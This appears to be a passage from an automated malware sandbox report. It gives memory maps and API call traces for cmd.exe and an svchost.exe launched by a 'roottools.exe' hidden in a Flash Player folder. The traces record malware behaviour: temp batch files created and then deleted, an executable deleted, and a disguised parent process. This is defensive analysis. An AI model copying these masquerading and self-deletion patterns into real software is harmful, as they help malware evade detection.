  • NT AUTHORITY\Logon Session 00000000:0000f83e (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID)
  • LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x 464
Region
+
Name Start VA End VA Type Permissions Monitored Dump YARA Match Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False
pagefile_0x0000000000020000 0x00020000 0x0002ffff Pagefile Backed Memory Readable, Writable True False False
private_0x0000000000030000 0x00030000 0x00031fff Private Memory Readable, Writable True False False
pagefile_0x0000000000030000 0x00030000 0x00036fff Pagefile Backed Memory Readable True False False
apisetschema.dll 0x00040000 0x00040fff Memory Mapped File Readable, Writable, Executable False False False
private_0x0000000000050000 0x00050000 0x0008ffff Private Memory Readable, Writable True False False
pagefile_0x0000000000090000 0x00090000 0x00093fff Pagefile Backed Memory Readable True False False
pagefile_0x00000000000a0000 0x000a0000 0x000a0fff Pagefile Backed Memory Readable True False False
pagefile_0x00000000000b0000 0x000b0000 0x000b1fff Pagefile Backed Memory Readable, Writable True False False
private_0x00000000000c0000 0x000c0000 0x000c0fff Private Memory Readable, Writable True False False
private_0x00000000000d0000 0x000d0000 0x001cffff Private Memory Readable, Writable True False False
locale.nls 0x001d0000 0x00236fff Memory Mapped File Readable False False False
private_0x0000000000240000 0x00240000 0x00240fff Private Memory Readable, Writable True False False
private_0x0000000000250000 0x00250000 0x0025ffff Private Memory Readable, Writable True False False
private_0x0000000000340000 0x00340000 0x003bffff Private Memory Readable, Writable True False False
private_0x0000000000530000 0x00530000 0x0062ffff Private Memory Readable, Writable True False False
private_0x00000000007b0000 0x007b0000 0x007bffff Private Memory Readable, Writable True False False
pagefile_0x00000000007c0000 0x007c0000 0x00947fff Pagefile Backed Memory Readable True False False
pagefile_0x0000000000950000 0x00950000 0x00ad0fff Pagefile Backed Memory Readable True False False
pagefile_0x0000000000ae0000 0x00ae0000 0x01edffff Pagefile Backed Memory Readable True False False
pagefile_0x0000000001ee0000 0x01ee0000 0x02222fff Pagefile Backed Memory Readable True False False
cmd.exe 0x4a530000 0x4a57bfff Memory Mapped File Readable, Writable, Executable True False False
wow64cpu.dll 0x743d0000 0x743d7fff Memory Mapped File Readable, Writable, Executable False False False
wow64win.dll 0x743e0000 0x7443bfff Memory Mapped File Readable, Writable, Executable False False False
wow64.dll 0x74440000 0x7447efff Memory Mapped File Readable, Writable, Executable False False False
winbrand.dll 0x756d0000 0x756d6fff Memory Mapped File Readable, Writable, Executable False False False
cryptbase.dll 0x75800000 0x7580bfff Memory Mapped File Readable, Writable, Executable False False False
sspicli.dll 0x75810000 0x7586ffff Memory Mapped File Readable, Writable, Executable False False False
user32.dll 0x758c0000 0x759bffff Memory Mapped File Readable, Writable, Executable False False False
kernel32.dll 0x759c0000 0x75acffff Memory Mapped File Readable, Writable, Executable False False False
msvcrt.dll 0x75e70000 0x75f1bfff Memory Mapped File Readable, Writable, Executable False False False
imm32.dll 0x760b0000 0x7610ffff Memory Mapped File Readable, Writable, Executable False False False
usp10.dll 0x76110000 0x761acfff Memory Mapped File Readable, Writable, Executable False False False
msctf.dll 0x76570000 0x7663bfff Memory Mapped File Readable, Writable, Executable False False False
kernelbase.dll 0x76640000 0x76685fff Memory Mapped File Readable, Writable, Executable False False False
sechost.dll 0x767d0000 0x767e8fff Memory Mapped File Readable, Writable, Executable False False False
rpcrt4.dll 0x76800000 0x768effff Memory Mapped File Readable, Writable, Executable False False False
lpk.dll 0x768f0000 0x768f9fff Memory Mapped File Readable, Writable, Executable False False False
gdi32.dll 0x76950000 0x769dffff Memory Mapped File Readable, Writable, Executable False False False
advapi32.dll 0x77740000 0x777dffff Memory Mapped File Readable, Writable, Executable False False False
private_0x00000000778b0000 0x778b0000 0x779a9fff Private Memory Readable, Writable, Executable True False False
private_0x00000000779b0000 0x779b0000 0x77acefff Private Memory Readable, Writable, Executable True False False
ntdll.dll 0x77ad0000 0x77c78fff Memory Mapped File Readable, Writable, Executable False False False
ntdll.dll 0x77cb0000 0x77e2ffff Memory Mapped File Readable, Writable, Executable False False False
pagefile_0x000000007efb0000 0x7efb0000 0x7efd2fff Pagefile Backed Memory Readable True False False
private_0x000000007efdb000 0x7efdb000 0x7efddfff Private Memory Readable, Writable True False False
private_0x000000007efde000 0x7efde000 0x7efdefff Private Memory Readable, Writable True False False
private_0x000000007efdf000 0x7efdf000 0x7efdffff Private Memory Readable, Writable True False False
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False
private_0x000000007fff0000 0x7fff0000 0x7fffffeffff Private Memory Readable True False False
Threads
Thread 0x464
(Host: 99, Network: 0)
+
Category Operation Information Success Count Logfile
System Get Time type = System Time, time = 2018-01-10 18:57:08 (UTC) True 1
Fn
System Get Time type = Ticks, time = 55271 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\cmd.exe, base_address = 0x4a530000 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetThreadUILanguage, address_out = 0x759ea84f True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System False 1
Fn
File Open filename = STD_OUTPUT_HANDLE True 3
Fn
File Open filename = STD_INPUT_HANDLE True 2
Fn
Environment Get Environment String - True 2
Fn
Data
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 0, type = REG_NONE False 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = AutoRun, data = 64, type = REG_NONE False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 64, type = REG_NONE False 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = AutoRun, data = 9, type = REG_NONE False 1
Fn
Module Get Filename process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 True 1
Fn
Environment Get Environment String name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ True 1
Fn
Environment Get Environment String name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC True 1
Fn
Environment Get Environment String name = PROMPT False 1
Fn
Environment Set Environment String name = PROMPT, value = $P$G True 1
Fn
Environment Get Environment String - True 1
Fn
Data
Environment Get Environment String name = COMSPEC, result_out = C:\Windows\system32\cmd.exe True 1
Fn
Environment Get Environment String name = KEYS False 1
Fn
File Get Info filename = C:\Windows\system32, type = file_attributes True 1
Fn
File Get Info filename = C:\Windows\System32, type = file_attributes True 1
Fn
Environment Set Environment String name = =C:, value = C:\Windows\System32 True 1
Fn
Environment Get Environment String - True 1
Fn
Data
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CopyFileExW, address_out = 0x759f3b92 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsDebuggerPresent, address_out = 0x759d4a5d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetConsoleInputExeNameW, address_out = 0x759ea79d True 1
Fn
Environment Get Environment String name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x77740000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = SaferIdentifyLevel, address_out = 0x77762102 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = SaferComputeTokenFromLevel, address_out = 0x77763352 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = SaferCloseLevel, address_out = 0x77763825 True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Local\Temp\upd9dba1b78.bat, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Open filename = STD_INPUT_HANDLE True 2
Fn
File Read filename = STD_INPUT_HANDLE, size = 8191, size_out = 216 True 1
Fn
Data
File Open filename = STD_INPUT_HANDLE True 1
Fn
File Get Info filename = STD_INPUT_HANDLE, type = file_type True 1
Fn
File Open filename = STD_INPUT_HANDLE True 1
Fn
File Open filename = STD_OUTPUT_HANDLE True 2
Fn
File Open filename = STD_INPUT_HANDLE True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Local\Temp\upd9dba1b78.bat, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Open filename = STD_INPUT_HANDLE True 2
Fn
File Read filename = STD_INPUT_HANDLE, size = 8191, size_out = 205 True 1
Fn
Data
File Open filename = STD_INPUT_HANDLE True 1
Fn
File Get Info filename = STD_INPUT_HANDLE, type = file_type True 1
Fn
File Open filename = STD_INPUT_HANDLE True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Local\Temp\upd9dba1b78.bat, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Open filename = STD_INPUT_HANDLE True 2
Fn
File Read filename = STD_INPUT_HANDLE, size = 8191, size_out = 201 True 1
Fn
Data
File Open filename = STD_INPUT_HANDLE True 1
Fn
File Get Info filename = STD_INPUT_HANDLE, type = file_type True 1
Fn
File Open filename = STD_INPUT_HANDLE True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Local\Temp\upde25b4796.exe, type = file_attributes True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Local\Temp, type = file_attributes True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Local\Temp\upde25b4796.exe, type = file_attributes True 1
Fn
File Delete filename = C:\Users\aETAdzjz\AppData\Local\Temp\upde25b4796.exe True 1
Fn
File Open filename = STD_OUTPUT_HANDLE True 2
Fn
File Open filename = STD_INPUT_HANDLE True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Local\Temp\upd9dba1b78.bat, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Open filename = STD_INPUT_HANDLE True 2
Fn
File Read filename = STD_INPUT_HANDLE, size = 8191, size_out = 135 True 1
Fn
Data
File Open filename = STD_INPUT_HANDLE True 1
Fn
File Get Info filename = STD_INPUT_HANDLE, type = file_type True 1
Fn
File Open filename = STD_INPUT_HANDLE True 1
Fn
File Open filename = STD_OUTPUT_HANDLE True 2
Fn
File Open filename = STD_INPUT_HANDLE True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Local\Temp\upd9dba1b78.bat, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Open filename = STD_INPUT_HANDLE True 2
Fn
File Read filename = STD_INPUT_HANDLE, size = 8191, size_out = 63 True 1
Fn
Data
File Open filename = STD_INPUT_HANDLE True 1
Fn
File Get Info filename = STD_INPUT_HANDLE, type = file_type True 1
Fn
File Open filename = STD_INPUT_HANDLE True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Local\Temp\upd9dba1b78.bat, type = file_attributes True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Local\Temp, type = file_attributes True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Local\Temp\upd9dba1b78.bat, type = file_attributes True 1
Fn
File Delete filename = C:\Users\aETAdzjz\AppData\Local\Temp\upd9dba1b78.bat True 1
Fn
File Open filename = STD_OUTPUT_HANDLE True 2
Fn
File Open filename = STD_INPUT_HANDLE True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Local\Temp\upd9dba1b78.bat, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE False 1
Fn
File Open filename = STD_ERROR_HANDLE True 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type True 1
Fn
File Open filename = STD_ERROR_HANDLE True 2
Fn
File Write filename = STD_ERROR_HANDLE, size = 33 True 1
Fn
Data
File Open filename = STD_OUTPUT_HANDLE True 2
Fn
File Open filename = STD_INPUT_HANDLE True 1
Fn
Process #24: svchost.exe
(Host: 7573, Network: 376)
+
Information Value
ID #24
File Name c:\windows\syswow64\svchost.exe
Command Line C:\Windows\SysWOW64\svchost.exe -k netsvcs
Initial Working Directory C:\Users\aETAdzjz\AppData\Roaming\
Monitor Start Time: 00:07:38, Reason: Child Process
Unmonitor End Time: 00:10:13, Reason: Terminated by Timeout
Monitor Duration 00:02:35
OS Process Information
+
Information Value
PID 0x638
Parent PID 0x7e8 (c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe)
Is Created or Modified Executable False
Integrity Level Medium
Username YKYD69Q\aETAdzjz
Groups
  • YKYD69Q\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • BUILTIN\Administrators (USE_FOR_DENY_ONLY)
  • BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Logon Session 00000000:0000f83e (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID)
  • LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x 6FC
0x 538
0x 760
0x 594
0x 7BC
0x 74C
0x 548
0x 7D8
0x 7A8
0x 774
0x 12C
0x 790
0x 794
0x 698
0x 728
0x 670
0x 71C
Region
+
Name Start VA End VA Type Permissions Monitored Dump YARA Match Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False
pagefile_0x0000000000020000 0x00020000 0x00026fff Pagefile Backed Memory Readable True False False
private_0x0000000000030000 0x00030000 0x00031fff Private Memory Readable, Writable True False False
private_0x0000000000030000 0x00030000 0x0003ffff Private Memory Readable, Writable True False False
apisetschema.dll 0x00040000 0x00040fff Memory Mapped File Readable, Writable, Executable False False False
pagefile_0x0000000000050000 0x00050000 0x00053fff Pagefile Backed Memory Readable True False False
pagefile_0x0000000000060000 0x00060000 0x00060fff Pagefile Backed Memory Readable True False False
private_0x0000000000070000 0x00070000 0x0008bfff Private Memory Readable, Writable, Executable True False False
imm32.dll 0x00090000 0x000adfff Memory Mapped File Readable False False False
pagefile_0x0000000000090000 0x00090000 0x00091fff Pagefile Backed Memory Readable, Writable True False False
private_0x00000000000a0000 0x000a0000 0x000a0fff Private Memory Readable, Writable True False False
private_0x00000000000b0000 0x000b0000 0x000b0fff Private Memory Readable, Writable True False False
pagefile_0x00000000000c0000 0x000c0000 0x000c1fff Pagefile Backed Memory Readable True False False
windowsshell.manifest 0x000d0000 0x000d0fff Memory Mapped File Readable False False False
pagefile_0x00000000000d0000 0x000d0000 0x000d0fff Pagefile Backed Memory Readable, Writable True False False
pagefile_0x00000000000e0000 0x000e0000 0x000e1fff Pagefile Backed Memory Readable True False False
private_0x00000000000f0000 0x000f0000 0x0012ffff Private Memory Readable, Writable True False False
index.dat 0x00130000 0x0013bfff Memory Mapped File Readable, Writable True False False
private_0x0000000000140000 0x00140000 0x0017ffff Private Memory Readable, Writable True False False
index.dat 0x00140000 0x00147fff Memory Mapped File Readable, Writable True False False
index.dat 0x00150000 0x0015ffff Memory Mapped File Readable, Writable True False False
private_0x0000000000160000 0x00160000 0x0018ffff Private Memory Readable, Writable True False False
private_0x0000000000160000 0x00160000 0x001affff Private Memory Readable, Writable True False False
private_0x0000000000160000 0x00160000 0x00160fff Private Memory Readable, Writable True False False
pagefile_0x0000000000160000 0x00160000 0x00160fff Pagefile Backed Memory Readable True False False
private_0x0000000000170000 0x00170000 0x001affff Private Memory Readable, Writable True False False
private_0x0000000000190000 0x00190000 0x001cffff Private Memory Readable, Writable True False False
rsaenh.dll 0x001d0000 0x0020bfff Memory Mapped File Readable False False False
private_0x00000000001d0000 0x001d0000 0x0020ffff Private Memory Readable, Writable True False False
private_0x0000000000210000 0x00210000 0x0024ffff Private Memory Readable, Writable True False False
locale.nls 0x00250000 0x002b6fff Memory Mapped File Readable False False False
private_0x00000000002e0000 0x002e0000 0x0035ffff Private Memory Readable, Writable True False False
private_0x0000000000360000 0x00360000 0x0044ffff Private Memory Readable, Writable True False False
private_0x0000000000390000 0x00390000 0x003cffff Private Memory Readable, Writable True False False
private_0x00000000003d0000 0x003d0000 0x0044ffff Private Memory Readable, Writable True False False
svchost.exe 0x004a0000 0x004a7fff Memory Mapped File Readable, Writable, Executable False False False
private_0x00000000004f0000 0x004f0000 0x0052ffff Private Memory Readable, Writable True False False
private_0x0000000000540000 0x00540000 0x0063ffff Private Memory Readable, Writable True False False
pagefile_0x0000000000640000 0x00640000 0x007c7fff Pagefile Backed Memory Readable True False False
pagefile_0x00000000007d0000 0x007d0000 0x00950fff Pagefile Backed Memory Readable True False False
pagefile_0x0000000000960000 0x00960000 0x01d5ffff Pagefile Backed Memory Readable True False False
pagefile_0x0000000001d60000 0x01d60000 0x02152fff Pagefile Backed Memory Readable True False False
sortdefault.nls 0x02160000 0x0242efff Memory Mapped File Readable False False False
private_0x0000000002430000 0x02430000 0x0246ffff Private Memory Readable, Writable True False False
private_0x0000000002480000 0x02480000 0x024bffff Private Memory Readable, Writable True False False
private_0x0000000002520000 0x02520000 0x0255ffff Private Memory Readable, Writable True False False
private_0x0000000002590000 0x02590000 0x025cffff Private Memory Readable, Writable True False False
private_0x00000000025e0000 0x025e0000 0x0261ffff Private Memory Readable, Writable True False False
private_0x0000000002620000 0x02620000 0x0265ffff Private Memory Readable, Writable True False False
private_0x0000000002690000 0x02690000 0x026cffff Private Memory Readable, Writable True False False
private_0x00000000026d0000 0x026d0000 0x0270ffff Private Memory Readable, Writable True False False
private_0x0000000002760000 0x02760000 0x0279ffff Private Memory Readable, Writable True False False
private_0x00000000027a0000 0x027a0000 0x027dffff Private Memory Readable, Writable True False False
private_0x00000000027e0000 0x027e0000 0x0281ffff Private Memory Readable, Writable True False False
private_0x0000000002820000 0x02820000 0x028dffff Private Memory Readable, Writable True False False
private_0x0000000002840000 0x02840000 0x0287ffff Private Memory Readable, Writable True False False
private_0x00000000028a0000 0x028a0000 0x028dffff Private Memory Readable, Writable True False False
private_0x00000000028e0000 0x028e0000 0x0291ffff Private Memory Readable, Writable True False False
private_0x0000000002940000 0x02940000 0x0297ffff Private Memory Readable, Writable True False False
private_0x0000000002990000 0x02990000 0x029cffff Private Memory Readable, Writable True False False
private_0x00000000029d0000 0x029d0000 0x02acffff Private Memory Readable, Writable True False False
private_0x0000000002ad0000 0x02ad0000 0x02b0ffff Private Memory Readable, Writable True False False
private_0x0000000002b70000 0x02b70000 0x02baffff Private Memory Readable, Writable True False False
private_0x0000000002bc0000 0x02bc0000 0x02bfffff Private Memory Readable, Writable True False False
private_0x0000000002c00000 0x02c00000 0x02c3ffff Private Memory Readable, Writable True False False
private_0x0000000002c70000 0x02c70000 0x02caffff Private Memory Readable, Writable True False False
private_0x0000000002cb0000 0x02cb0000 0x02dbffff Private Memory Readable, Writable True False False
private_0x0000000002dc0000 0x02dc0000 0x02ecffff Private Memory Readable, Writable True False False
private_0x0000000002de0000 0x02de0000 0x02e1ffff Private Memory Readable, Writable True False False
private_0x0000000002ec0000 0x02ec0000 0x02ecffff Private Memory Readable, Writable True False False
private_0x0000000002ed0000 0x02ed0000 0x0308ffff Private Memory Readable, Writable True False False
wow64cpu.dll 0x743d0000 0x743d7fff Memory Mapped File Readable, Writable, Executable False False False
wow64win.dll 0x743e0000 0x7443bfff Memory Mapped File Readable, Writable, Executable False False False
wow64.dll 0x74440000 0x7447efff Memory Mapped File Readable, Writable, Executable False False False
wshtcpip.dll 0x75270000 0x75274fff Memory Mapped File Readable, Writable, Executable False False False
winrnr.dll 0x75280000 0x75287fff Memory Mapped File Readable, Writable, Executable False False False
mswsock.dll 0x75290000 0x752cbfff Memory Mapped File Readable, Writable, Executable False False False
pnrpnsp.dll 0x752d0000 0x752e1fff Memory Mapped File Readable, Writable, Executable False False False
napinsp.dll 0x752f0000 0x752fffff Memory Mapped File Readable, Writable, Executable False False False
nlaapi.dll 0x75300000 0x7530ffff Memory Mapped File Readable, Writable, Executable False False False
rasadhlp.dll 0x75310000 0x75315fff Memory Mapped File Readable, Writable, Executable False False False
sensapi.dll 0x75320000 0x75325fff Memory Mapped File Readable, Writable, Executable False False False
rasman.dll 0x75330000 0x75344fff Memory Mapped File Readable, Writable, Executable False False False
rasapi32.dll 0x75350000 0x753a1fff Memory Mapped File Readable, Writable, Executable False False False
schannel.dll 0x753b0000 0x753e9fff Memory Mapped File Readable, Writable, Executable False False False
userenv.dll 0x753f0000 0x75406fff Memory Mapped File Readable, Writable, Executable False False False
dnsapi.dll 0x75410000 0x75453fff Memory Mapped File Readable, Writable, Executable False False False
ntmarta.dll 0x75460000 0x75480fff Memory Mapped File Readable, Writable, Executable False False False
comctl32.dll 0x75490000 0x7562dfff Memory Mapped File Readable, Writable, Executable False False False
rsaenh.dll 0x75630000 0x7566afff Memory Mapped File Readable, Writable, Executable False False False
cryptsp.dll 0x75670000 0x75685fff Memory Mapped File Readable, Writable, Executable False False False
secur32.dll 0x75690000 0x75697fff Memory Mapped File Readable, Writable, Executable False False False
rtutils.dll 0x756a0000 0x756acfff Memory Mapped File Readable, Writable, Executable False False False
iphlpapi.dll 0x756b0000 0x756cbfff Memory Mapped File Readable, Writable, Executable False False False
profapi.dll 0x756d0000 0x756dafff Memory Mapped File Readable, Writable, Executable False False False
winnsi.dll 0x756e0000 0x756e6fff Memory Mapped File Readable, Writable, Executable False False False
cryptbase.dll 0x75800000 0x7580bfff Memory Mapped File Readable, Writable, Executable False False False
sspicli.dll 0x75810000 0x7586ffff Memory Mapped File Readable, Writable, Executable False False False
user32.dll 0x758c0000 0x759bffff Memory Mapped File Readable, Writable, Executable False False False
kernel32.dll 0x759c0000 0x75acffff Memory Mapped File Readable, Writable, Executable False False False
psapi.dll 0x75ad0000 0x75ad4fff Memory Mapped File Readable, Writable, Executable False False False
ole32.dll 0x75ae0000 0x75c3bfff Memory Mapped File Readable, Writable, Executable False False False
iertutil.dll 0x75c40000 0x75e3afff Memory Mapped File Readable, Writable, Executable False False False
msvcrt.dll 0x75e70000 0x75f1bfff Memory Mapped File Readable, Writable, Executable False False False
wininet.dll 0x75f20000 0x76014fff Memory Mapped File Readable, Writable, Executable False False False
imm32.dll 0x760b0000 0x7610ffff Memory Mapped File Readable, Writable, Executable False False False
usp10.dll 0x76110000 0x761acfff Memory Mapped File Readable, Writable, Executable False False False
oleaut32.dll 0x761b0000 0x7623efff Memory Mapped File Readable, Writable, Executable False False False
crypt32.dll 0x76240000 0x7635cfff Memory Mapped File Readable, Writable, Executable False False False
msasn1.dll 0x76360000 0x7636bfff Memory Mapped File Readable, Writable, Executable False False False
shlwapi.dll 0x76370000 0x763c6fff Memory Mapped File Readable, Writable, Executable False False False
msctf.dll 0x76570000 0x7663bfff Memory Mapped File Readable, Writable, Executable False False False
kernelbase.dll 0x76640000 0x76685fff Memory Mapped File Readable, Writable, Executable False False False
urlmon.dll 0x76690000 0x767c5fff Memory Mapped File Readable, Writable, Executable False False False
sechost.dll 0x767d0000 0x767e8fff Memory Mapped File Readable, Writable, Executable False False False
nsi.dll 0x767f0000 0x767f5fff Memory Mapped File Readable, Writable, Executable False False False
rpcrt4.dll 0x76800000 0x768effff Memory Mapped File Readable, Writable, Executable False False False
lpk.dll 0x768f0000 0x768f9fff Memory Mapped File Readable, Writable, Executable False False False
wldap32.dll 0x76900000 0x76944fff Memory Mapped File Readable, Writable, Executable False False False
gdi32.dll 0x76950000 0x769dffff Memory Mapped File Readable, Writable, Executable False False False
wintrust.dll 0x76a40000 0x76a6cfff Memory Mapped File Readable, Writable, Executable False False False
shell32.dll 0x76a70000 0x776b9fff Memory Mapped File Readable, Writable, Executable False False False
advapi32.dll 0x77740000 0x777dffff Memory Mapped File Readable, Writable, Executable False False False
ws2_32.dll 0x777e0000 0x77814fff Memory Mapped File Readable, Writable, Executable False False False
private_0x00000000778b0000 0x778b0000 0x779a9fff Private Memory Readable, Writable, Executable True False False
private_0x00000000779b0000 0x779b0000 0x77acefff Private Memory Readable, Writable, Executable True False False
ntdll.dll 0x77ad0000 0x77c78fff Memory Mapped File Readable, Writable, Executable False False False
ntdll.dll 0x77cb0000 0x77e2ffff Memory Mapped File Readable, Writable, Executable False False False
private_0x000000007ef92000 0x7ef92000 0x7ef94fff Private Memory Readable, Writable True False False
private_0x000000007ef95000 0x7ef95000 0x7ef97fff Private Memory Readable, Writable True False False
private_0x000000007ef98000 0x7ef98000 0x7ef9afff Private Memory Readable, Writable True False False
private_0x000000007ef9b000 0x7ef9b000 0x7ef9dfff Private Memory Readable, Writable True False False
private_0x000000007ef9e000 0x7ef9e000 0x7efa0fff Private Memory Readable, Writable True False False
private_0x000000007efa1000 0x7efa1000 0x7efa3fff Private Memory Readable, Writable True False False
private_0x000000007efa4000 0x7efa4000 0x7efa6fff Private Memory Readable, Writable True False False
private_0x000000007efa7000 0x7efa7000 0x7efa9fff Private Memory Readable, Writable True False False
private_0x000000007efaa000 0x7efaa000 0x7efacfff Private Memory Readable, Writable True False False
private_0x000000007efad000 0x7efad000 0x7efaffff Private Memory Readable, Writable True False False
pagefile_0x000000007efb0000 0x7efb0000 0x7efd2fff Pagefile Backed Memory Readable True False False
private_0x000000007efd5000 0x7efd5000 0x7efd7fff Private Memory Readable, Writable True False False
private_0x000000007efd8000 0x7efd8000 0x7efdafff Private Memory Readable, Writable True False False
private_0x000000007efdb000 0x7efdb000 0x7efddfff Private Memory Readable, Writable True False False
private_0x000000007efde000 0x7efde000 0x7efdefff Private Memory Readable, Writable True False False
private_0x000000007efdf000 0x7efdf000 0x7efdffff Private Memory Readable, Writable True False False
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False
